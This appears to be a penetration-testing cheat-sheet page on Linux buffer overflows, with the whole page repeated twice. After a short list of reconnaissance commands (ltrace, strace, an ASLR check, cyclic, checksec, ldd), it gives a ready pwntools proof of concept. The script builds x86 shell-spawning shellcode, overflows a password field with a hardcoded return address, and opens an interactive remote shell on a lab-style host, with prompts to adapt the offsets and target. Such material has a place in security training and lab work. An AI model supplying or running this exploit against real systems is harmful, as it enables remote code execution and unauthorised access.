Buffer Overflow - Linux

#Look for strcmp()
ltrace
strace

#Look for ASLR = 0
cat /proc/sys/kernel/randomize_va_space

#Generate Characters
cyclic 300

#Check for binary protection
checksec

#Enumerate addresses
ldd

`POC`

Make sure to adapt the buffer size, return address and IP/PORT to the current scenario:

from pwn import *

shellcode = (
  b"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58"
   b"\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f"
   b"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
)

payload = b"A" * 28 + p32(0xffffd630) + shellcode # Change this


r = remote('10.10.10.34', 7411) # Change this


print(r.recv(1024).decode())  
r.sendline(b'USER admin')    
print(r.recv(1024).decode())  
r.sendline(b'PASS ' + payload)  
r.interactive()

PreviousKernel Exploits NextEscaping Docker

Last updated 2 months ago

Buffer Overflow - Linux

#Look for strcmp()
ltrace
strace

#Look for ASLR = 0
cat /proc/sys/kernel/randomize_va_space

#Generate Characters
cyclic 300

#Check for binary protection
checksec

#Enumerate addresses
ldd

`POC`

Make sure to adapt the buffer size, return address and IP/PORT to the current scenario:

from pwn import *

shellcode = (
  b"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58"
   b"\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f"
   b"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"
)

payload = b"A" * 28 + p32(0xffffd630) + shellcode # Change this


r = remote('10.10.10.34', 7411) # Change this


print(r.recv(1024).decode())  
r.sendline(b'USER admin')    
print(r.recv(1024).decode())  
r.sendline(b'PASS ' + payload)  
r.interactive()

PreviousKernel Exploits NextEscaping Docker

Last updated 2 months ago